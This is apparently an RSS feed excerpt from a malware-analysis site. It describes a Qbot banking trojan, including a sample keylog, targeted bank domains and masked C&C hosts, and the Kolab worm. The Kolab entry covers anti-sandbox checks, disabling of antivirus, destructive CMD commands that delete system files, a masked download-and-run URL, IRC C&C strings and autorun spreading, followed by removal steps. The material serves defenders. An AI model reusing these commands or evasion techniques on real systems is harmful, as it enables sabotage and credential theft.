t=kb time=[23:50:16-9/4/2011] p=[iexplore.exe] b=[http://vk.com]
t=kb time=[23:50:34-9/4/2011] p=[iexplore.exe] b=[IvanIvanov@mail.ru]
t=kb time=[23:50:41-9/4/2011] p=[iexplore.exe] b=[MyPassword]
t=u1 time=[23:50:42-9/4/2011] ua=[Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)]
t=h1 time=[23:50:42-9/4/2011] url=[http://login.vk.com/?act=login] data=[act=login&amp;amp;q=1&amp;amp;al_frame=1&amp;amp;expire=&amp;amp;captcha_sid=&amp;amp;captcha_key=&amp;amp;from_host=vk.com&amp;amp;email=IvanIvanov@mail.ru&amp;amp;pass=MyPassword] referer=[http://vk.com] cookie=[remixlang=0; remixchk=5]
&lt;/pre&gt;
&lt;p&gt;The generated log can be sent to the attacker's server.
&lt;/p&gt;&lt;p&gt;Using the extracted DLL the backdoor can steal confidential user's information in case of authentication on the following resources that provide online banking services:
&lt;/p&gt;
&lt;pre&gt;
cashproonline.bankofamerica.com
singlepoint.usbank.com
netconnect.bokf.com
business-eb.ibanking-services.com
cashproonline.bankofamerica.com
ebanking-services.com
web-cashplu's. com
treas-mgt.frostbank.com
business-eb.ibanking-services.com
treasury.pncbank.com
access.jpmorgan.com
ktt.key.com
premierview.membersunited.org
directline4biz.com
onb.webcashmgmt.com
tmconnectweb
moneymanagergps.com
ibc.klikbca.com
directpay.wellsfargo.com
express.53.com
itreasury.regions.com
itreasurypr.regions.com
cpw-achweb.bankofamerica.com
businessaccess.citibank.citigroup.com
businessonline.huntington.com
&lt;/pre&gt;
&lt;p&gt;Also the considered DLL exports the function "zupidshc21mnu", designed to remove the installed hook procedure.
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; It connects to the following servers:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
n**0.in
d**1.in
ad***v.co.in
u**03.com.ua
red****er.com.ua
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; Following an attacker's command, the backdoor can perform the following actions:
&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;- Gathering information;
&lt;/p&gt;&lt;p&gt;- Send collected information to the specified server;
&lt;/p&gt;&lt;p&gt;- Downloading files.
&lt;/p&gt;&lt;p&gt;- Update its executable;
&lt;/p&gt;&lt;p&gt;- Run and terminate processes;
&lt;/p&gt;&lt;p&gt;- Start and stop services;
&lt;/p&gt;&lt;p&gt;- Self-destruction.
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; The described functionality can be injected into the address space of the following processes:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
explorer.exe
iexplore.exe
outlook.exe
firefox.exe
opera.exe
skype.exe
msnmsgr.exe
yahoomessenger.exe
chrome.exe
&lt;/pre&gt;
&lt;p&gt;The malicious program can be run with the following parameters:
&lt;/p&gt;&lt;p&gt;/t - it sends the WM_QUIT message to the window "&amp;lt;rnd_1&amp;gt; &amp;lt;username&amp;gt;" and end its work.
&lt;/p&gt;&lt;p&gt;/s - the malware is started as a Windows service.
&lt;/p&gt;&lt;p&gt;/i - it extracts the files:
&lt;/p&gt;
&lt;pre&gt;
%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_1&amp;gt;.dll
%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_3&amp;gt;.dll
&lt;/pre&gt;
&lt;p&gt;and, after this, it terminates.
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_Instructions"&gt;Removal Instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:
&lt;/p&gt;&lt;p&gt;1. Restart the computer in "Safe Mode" (at the beginning of loading press and hold «F8», then select «Safe Mode» at the Windows boot menu).
&lt;/p&gt;&lt;p&gt;2. Delete the following files:
&lt;/p&gt;
&lt;pre&gt;
%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_1&amp;gt;.exe
%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_1&amp;gt;.dll 
%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_3&amp;gt;.dll
%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_4&amp;gt;.dll
&lt;/pre&gt;
&lt;p&gt;3. Delete keys created by the malware and restore the original keys value ​​in the branches of the system registry:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce]
&lt;/pre&gt;
&lt;p&gt;4. Delete the original trojan file (its location on the infected computer will depend on how the program originally penetrated the victim machine).
&lt;/p&gt;&lt;p&gt;5. Clear the Temporary Internet Files directory, which may contain infected files.
&lt;/p&gt;&lt;p&gt;6. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sat, 16 Apr 2011 23:17:17 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Trojan-PSW.Win32.Qbot.byy</guid>
		</item>
		<item>
			<title>Net-Worm.Win32.Kolab.wwh</title>
			<link>http://www.totalmalwareinfo.com/eng/Net-Worm.Win32.Kolab.wwh</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;The worm provides an attacker with a remote access to an infected machine. It is a Windows application (PE-EXE file). It is 219,648 bytes in size. It is packed by UPX. The unpacked file is about 415 KB in size. It is written in C++.
&lt;/p&gt;&lt;p&gt;MD5: A5186E9AA2F8C37E80852DD52E31284B
&lt;/p&gt;&lt;p&gt;SHA1: D91712CB8289A5D11E2DC1D586AA31F9FA98C9C2
&lt;/p&gt;
&lt;table id="toc" class="toc"&gt;&lt;tr&gt;&lt;td&gt;&lt;div id="toctitle"&gt;&lt;h2&gt;Contents&lt;/h2&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li class="toclevel-1 tocsection-1"&gt;&lt;a href="#Anti-debugging"&gt;&lt;span class="tocnumber"&gt;1&lt;/span&gt; &lt;span class="toctext"&gt;Anti-debugging&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li class="toclevel-1 tocsection-2"&gt;&lt;a href="#Installation"&gt;&lt;span class="tocnumber"&gt;2&lt;/span&gt; &lt;span class="toctext"&gt;Installation&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li class="toclevel-1 tocsection-3"&gt;&lt;a href="#Payload"&gt;&lt;span class="tocnumber"&gt;3&lt;/span&gt; &lt;span class="toctext"&gt;Payload&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li class="toclevel-1 tocsection-4"&gt;&lt;a href="#Propagation"&gt;&lt;span class="tocnumber"&gt;4&lt;/span&gt; &lt;span class="toctext"&gt;Propagation&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li class="toclevel-1 tocsection-5"&gt;&lt;a href="#Removal_instructions"&gt;&lt;span class="tocnumber"&gt;5&lt;/span&gt; &lt;span class="toctext"&gt;Removal instructions&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;script&gt;if (window.showTocToggle) { var tocShowText = "show"; var tocHideText = "hide"; showTocToggle(); } &lt;/script&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Anti-debugging"&gt;Anti-debugging&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;The worm implements anti-debugging algorithms that prevent it from running in virtual environments. The worm terminates and deletes its executable file in one of the following conditions:
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; the system registry key value:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
[HKLM\System\ControlSet001\Services\Disk\Enum]
&amp;quot;0&amp;quot;
&lt;/pre&gt;
&lt;p&gt;contains the strings:
&lt;/p&gt;
&lt;pre&gt;
VMware
VBox
Virtual
QEMU
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; The full path to the worm's executable file contains the substrings:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
sample
virus
sand-box
sandbox
malware
test
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; The names of a computer and a user contain a substring:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
VMG-CLIENT
MORTE
Malekal
HOME-OFF-D5F0AC
DELL-D3E62F7E26
KAKAPROU-6405DA
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; The system is running processes whose names contain substrings:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
port
vbox
vmsrvc
vmware
tcpview
wireshark.exe
regshot.exe
procmon.exe
filemon.exe
regmon.exe
procdump.exe
cports.exe
procexp.exe
squid.exe
dumpcap.exe
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; The windows have been found with the following parameters:
&lt;/li&gt;&lt;/ul&gt;
&lt;div class="center"&gt;&lt;div class="floatnone"&gt;&lt;a href="http://www.totalmalwareinfo.com/eng/File:Table_1.png" class="image"&gt;&lt;img alt="Table 1.png" src="http://www.totalmalwareinfo.com/en/images/8/8d/Table_1.png" width="479" height="245" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;
&lt;ul&gt;&lt;li&gt; The files have been found in the system:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
C:\Program Files\WinPcap\rpcapd.exe
C:\Program Files\WireShark\rawshark.exe
C:\Program Files\Ethereal\ethereal.html
C:\Program Files\Microsoft Network Monitor 3\netmon.exe
&lt;/pre&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Installation"&gt;Installation&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Once launched, the worm copies its body to the file:
&lt;/p&gt;
&lt;pre&gt;%System%\igfxtm32.exe
&lt;/pre&gt;
&lt;p&gt;The file attributes set to “hidden”,“system”.
&lt;/p&gt;&lt;p&gt;The following registry key is created to start the created copy automatically each time the system starts:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
&amp;quot;Intel Task Management&amp;quot; =&amp;nbsp;%System%\igfxtm32.exe
&lt;/pre&gt;
&lt;p&gt;Next, the created copy is executed with a parameter that contains the full path to the original worm’s file.
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Once launched, the worm performs the following actions:
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; Deletes the file specified in the parameter.
&lt;/li&gt;&lt;li&gt; Adds itself to the list of allowed network applications in Windows firewall by creating registry keys:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
&amp;quot;%System%\igfxtm32.exe&amp;quot; = &amp;quot;%System%\igfxtm32.exe:*:Enabled:wLAN&amp;quot;

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
&amp;quot;%System%\igfxtm32.exe&amp;quot; = &amp;quot;%System%\igfxtm32.exe:*:Enabled:wLAN&amp;quot;
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; Prohibits the displaying of hidden files by changing the system registry key values:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]
&amp;quot;CheckedValue&amp;quot; = &amp;quot;1&amp;quot;

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
&amp;quot;Hidden&amp;quot; = &amp;quot;2&amp;quot;
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; Allows its application to run with administrator privileges every time, by adding a reference to its executable file in the list of exceptions DEP (Data Execution Prevention), by modifying the registry key:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
[HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers]
&amp;quot;%System%\igfxtm32.exe&amp;quot; = &amp;quot;DisableNXShowUI&amp;quot;
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; Disables system restore, changing the key values:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
[HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore]
&amp;quot;DisableSR&amp;quot; = &amp;quot;1&amp;quot;

[HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore]
&amp;quot;DisableConfig&amp;quot; = &amp;quot;1&amp;quot;
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; Changes the settings of Windows Security Center, disabling its notifications and components. To do this, the key values are changed:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt; 
[HKLM\Software\Microsoft\Security Center]
&amp;quot;AntiVirusOverride&amp;quot; = &amp;quot;1&amp;quot;
&amp;quot;AntiVirusDisableNotify&amp;quot; = &amp;quot;1&amp;quot;
&amp;quot;FirewallOverride&amp;quot; = &amp;quot;1&amp;quot;
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; Blocks booting the infected computer in "safe mode" by removing all the keys in the branches of the registry: 
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network]
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; Prohibits sending information to Microsoft about found threats on a computer, by creating the following registry key:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt; 
[HKLM\Software\Policies\Microsoft\MRT]
&amp;quot;DontReportInfectionInformation&amp;quot; = &amp;quot;1&amp;quot;
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; Disables the automatic startup of service called "wscsvc" ("Windows Security Center"), changing the key value:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
[HKLM\System\CurrentControlSet\Services\wscsvc]
&amp;quot;Start&amp;quot; = &amp;quot;4&amp;quot;
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; Sets the attributes "hidden", "system" for "%System%" directory. 
&lt;/li&gt;&lt;li&gt; Terminates the following processes:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
MBAMGUI.EXE
COMBOFIX.EXE
CATCHME.EXE
TEATIMER.EXE
MRT.EXE
MRTSTUB.EXE
TCPVIEW.EXE
HIJACKTHIS.EXE
MSMPENG.EXE
MSASCUI.EXE
MPCMDRUN.EXE
USBGUARD.EXE
BILLY.EXE
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; Terminates the processes that contain the following substrings in the names:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
recycler
temp
tmp
msvmiode.exe
drive32.exe
wudfhost.exe
svchos.exe
servicers.exe
uninstall_.exe
undmgr.exe
chgservice.exe
usbmngr.exe
serivces.exe
cmmon32.exe
rvhost.exe
&lt;/pre&gt;
&lt;p&gt;After that, it deletes the corresponding executable files of these processes.
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; Finds processes of system services, which names contain the substring:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
prevx
k7rtscan
ashserv
avguard
vsserv
avg
nod32krn
ekrn
mcshield
mbamservice
savservice
smc
rtvscan
dwengine
drwebcom
spidernt
spysweeper
outpost
tmpfw
uiWatchDog.exe
kpf4
cmdagent
vsmon
sbpflnch
acs
&lt;/pre&gt;
&lt;p&gt;The found services will be stopped and removed by running the following command sequence in "CMD":
&lt;/p&gt;
&lt;pre&gt;
CMD /C net stop &amp;lt;service name&amp;gt;
CMD /C sc stop &amp;lt; service name &amp;gt;
CMD /C sc config &amp;lt; service name &amp;gt; start= disabled
CMD /C sc delete &amp;lt; service name &amp;gt;
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; If the worm finds the windows with the parameters during its work:
&lt;/li&gt;&lt;/ul&gt;
&lt;div class="center"&gt;&lt;div class="floatnone"&gt;&lt;a href="http://www.totalmalwareinfo.com/eng/File:Table_2.png" class="image"&gt;&lt;img alt="Table 2.png" src="http://www.totalmalwareinfo.com/en/images/1/1f/Table_2.png" width="479" height="191" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;then the following sequence of commands will be executed:
&lt;/p&gt;
&lt;pre&gt;
CMD /C attrib -s -h &amp;quot;C:\ntldr&amp;quot;
CMD /C move &amp;quot;C:\ntldr&amp;quot; &amp;quot;C:\dump&amp;quot;
CMD /C del /F /S /Q &amp;quot;%WINDIR%\system32\hal.dll&amp;quot;
&lt;/pre&gt;
&lt;p&gt;Thus, the system file called "C:\ntldr" will be moved to "C:\dump", after that the following file will be deleted:
&lt;/p&gt;
&lt;pre&gt;%System%\hal.dll
&lt;/pre&gt;
&lt;p&gt;Then the process called "csrss.exe" will be terminated and the command will be executed:
&lt;/p&gt;
&lt;pre&gt;CMD /C "shutdown –s
&lt;/pre&gt;
&lt;p&gt;This will reboot the system.
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; If the worm finds the windows with the parameters during its work:
&lt;/li&gt;&lt;/ul&gt;
&lt;div class="center"&gt;&lt;div class="floatnone"&gt;&lt;a href="http://www.totalmalwareinfo.com/eng/File:Table_3.png" class="image"&gt;&lt;img alt="Table 3.png" src="http://www.totalmalwareinfo.com/en/images/8/89/Table_3.png" width="479" height="121" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;then the process called "csrss.exe" will be terminated and the command will be executed:
&lt;/p&gt;
&lt;pre&gt;CMD /C "shutdown –s
&lt;/pre&gt;
&lt;p&gt;This will reboot the system.
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; If the worm finds the running process with the name containing the string ".cfxxe", then the command will be executed:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;CMD /C del /F /S /Q \"C:\\ComboFix.txt\"
&lt;/pre&gt;
&lt;p&gt;This will delete the file "C:\ComboFix.txt".
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; Overwrites the files:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
C:\cwsandbox\cwsandbox.exe
C:\Program Files\Wireshark\wireshark.exe
&lt;/pre&gt;
&lt;p&gt;with a copy of:
&lt;/p&gt;
&lt;pre&gt;%WinDir%\notepad.exe
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; Injects into the process called "EXPLORER.EXE" executable code that downloads from the Internet file by the link:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;&lt;a href="http://vm.u****exy.su/net/p1.exe" class="external free"&gt;http://vm.u****exy.su/net/p1.exe&lt;/a&gt;
&lt;/pre&gt;
&lt;p&gt;Once the file is successfully downloaded it will be executed. At the time of writing, by the above link the downloaded file is 250,960 bytes in size; it is detected by Kaspersky Antivirus as "Net-Worm.Win32.Kolab.xoq". When you run malware second time the most of its functionality is injected into the process called "EXPLORER.EXE".
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; To carry out its main malicious functionality the worm turns to one of the command centers, which are located by the following links: 
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
s24.don****wanta.su
s19.don****wanta.su
&lt;/pre&gt;
&lt;p&gt;When the worm connects to the IRC-server, it sends the following data:
&lt;/p&gt;
&lt;pre&gt;
PASS 3v1l$
NICK N|&amp;lt;system_localization&amp;gt;| Z-363|1|&amp;lt;OS_version&amp;gt;|&amp;lt;service_information&amp;gt;
USER XP-SPX N|&amp;lt;system_localization &amp;gt;| Z-363|1|&amp;lt; OS_version&amp;gt;|&amp;lt;service_information&amp;gt; N|&amp;lt; system_localization &amp;gt;| Z-363|1|&amp;lt; OS_version&amp;gt;|&amp;lt;service_information&amp;gt;&amp;nbsp;:&amp;lt;computer_name&amp;gt;
&lt;/pre&gt;
&lt;p&gt;Next, it connects to the channel:
&lt;/p&gt;
&lt;pre&gt;JOIN ##t8nted!
&lt;/pre&gt;
&lt;p&gt;At the time of writing the above IRC-servers were not working.
&lt;/p&gt;&lt;p&gt;Also following the received commands from the server, the worm may perform the following actions:
&lt;/p&gt;&lt;p&gt;- upload files by the received links and run them;
&lt;/p&gt;&lt;p&gt;- self-destruction;
&lt;/p&gt;&lt;p&gt;- connect to another IRC-channel;
&lt;/p&gt;&lt;p&gt;- spread using instant messaging programs;
&lt;/p&gt;&lt;p&gt;- send arbitrary files by using instant messaging programs.
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Propagation"&gt;Propagation&lt;/span&gt;&lt;/h2&gt;
&lt;ul&gt;&lt;li&gt; via removable drives and network drives where the following file is placed:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;&amp;lt;name of infected drive&amp;gt;:\~TrashBin\t&amp;lt;rnd&amp;gt;.exe
&lt;/pre&gt;
&lt;p&gt;&amp;lt;rnd&amp;gt; – random seven-digit decimal number.
&lt;/p&gt;&lt;p&gt;This file is downloaded by the link:
&lt;/p&gt;
&lt;pre&gt;&lt;a href="http://vm.ub****xy.su/net/p1.exe" class="external free"&gt;http://vm.ub****xy.su/net/p1.exe&lt;/a&gt;
&lt;/pre&gt;
&lt;p&gt;The following file will be places at the same folder with the original file:
&lt;/p&gt;
&lt;pre&gt;&amp;lt;name of infected drive&amp;gt;:\autorun.inf
&lt;/pre&gt;
&lt;p&gt;This file is obfuscated.,In addition to junk, it contains the strings:
&lt;/p&gt;
&lt;pre&gt;
[Autorun]
open=~TrashBin\t&amp;lt;rnd&amp;gt;.exe
icon=%windir%\system32\SHELL32.dll,4
action=Open drive to view files with Explorer
shell\open=Open
shell\open\command=~TrashBin\t&amp;lt;rnd&amp;gt;.exe
shell\open\default=1
shell\explore=Explore
shell\explore\command=~TrashBin\t&amp;lt;rnd&amp;gt;.exe
shell\search=Search...
shell\search\command=~TrashBin\t&amp;lt;rnd&amp;gt;.exe
useautoplay=1
&lt;/pre&gt;
&lt;p&gt;This allows the worm to run automatically every time the user opens the infected disk using Windows Explorer. The file attributes are set up to "hidden" and "system".
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; Using Instant Messaging:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
Skype
AIM
ICQ
Yahoom Instant Messenger
Google Talk
MSN Messenger
Paltalk
Xfire
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; Through local resources, using &lt;a href="http://www.microsoft.com/technet/security/bulletin/ms10-061.mspx" class="external text"&gt;MS10-061&lt;/a&gt; vulnerability.
&lt;/li&gt;&lt;/ul&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_instructions"&gt;Removal instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:
&lt;/p&gt;&lt;p&gt;1. Use Kaspersky Rescue Disk (&lt;a href="http://support.kaspersky.ru/viruses/rescuedisk" class="external text"&gt;download Kaspersky Rescue Disk&lt;/a&gt;).
&lt;/p&gt;&lt;p&gt;2. Delete the original malicious file (the location on the infected computer will depend on how the program originally penetrated the victim machine).
&lt;/p&gt;&lt;p&gt;3. Delete the files:
&lt;/p&gt;
&lt;pre&gt;
%System%\igfxtm32.exe
&amp;lt;name of infected drive&amp;gt;:\~TrashBin\t&amp;lt;rnd&amp;gt;.exe
&amp;lt;name of infected drive&amp;gt;:\autorun.inf
&lt;/pre&gt;
&lt;p&gt;4. Delete the registry keys:
&lt;/p&gt;
&lt;pre&gt; 
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
&amp;quot;Intel Task Management&amp;quot; =&amp;nbsp;%System%\igfxtm32.exe

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
&amp;quot;%System%\igfxtm32.exe&amp;quot; = &amp;quot;%System%\igfxtm32.exe:*:Enabled:wLAN&amp;quot;

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
&amp;quot;%System%\igfxtm32.exe&amp;quot; = &amp;quot;%System%\igfxtm32.exe:*:Enabled:wLAN&amp;quot;

[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]
&amp;quot;CheckedValue&amp;quot; = &amp;quot;1&amp;quot;

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
&amp;quot;Hidden&amp;quot; = &amp;quot;2&amp;quot;

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers]
&amp;quot;%System%\igfxtm32.exe&amp;quot;=&amp;quot;DisableNXShowUI&amp;quot;

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore]
&amp;quot;DisableSR&amp;quot; = &amp;quot;1&amp;quot;

[HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore]
&amp;quot;DisableConfig&amp;quot; = &amp;quot;1&amp;quot;

[HKLM\Software\Microsoft\Security Center]
&amp;quot;AntiVirusOverride&amp;quot; = &amp;quot;1&amp;quot;
&amp;quot;AntiVirusDisableNotify&amp;quot; = &amp;quot;1&amp;quot;
&amp;quot;FirewallOverride&amp;quot; = &amp;quot;1&amp;quot;

[HKLM\Software\Policies\Microsoft\MRT]
&amp;quot;DontReportInfectionInformation&amp;quot; = &amp;quot;1&amp;quot;
&lt;/pre&gt;
&lt;p&gt;5. Restore the values of registry key:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\System\CurrentControlSet\Services\wscsvc]
&amp;quot;Start&amp;quot;
&lt;/pre&gt;
&lt;p&gt;6. In case the system files have been deleted, restore the system from a backup.
&lt;/p&gt;&lt;p&gt;7. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sat, 09 Apr 2011 23:27:20 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Net-Worm.Win32.Kolab.wwh</guid>
		</item>
		<item>
			<title>Exploit.Java.Agent.ca</title>
			<link>http://www.totalmalwareinfo.com/eng/Exploit.Java.Agent.ca</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
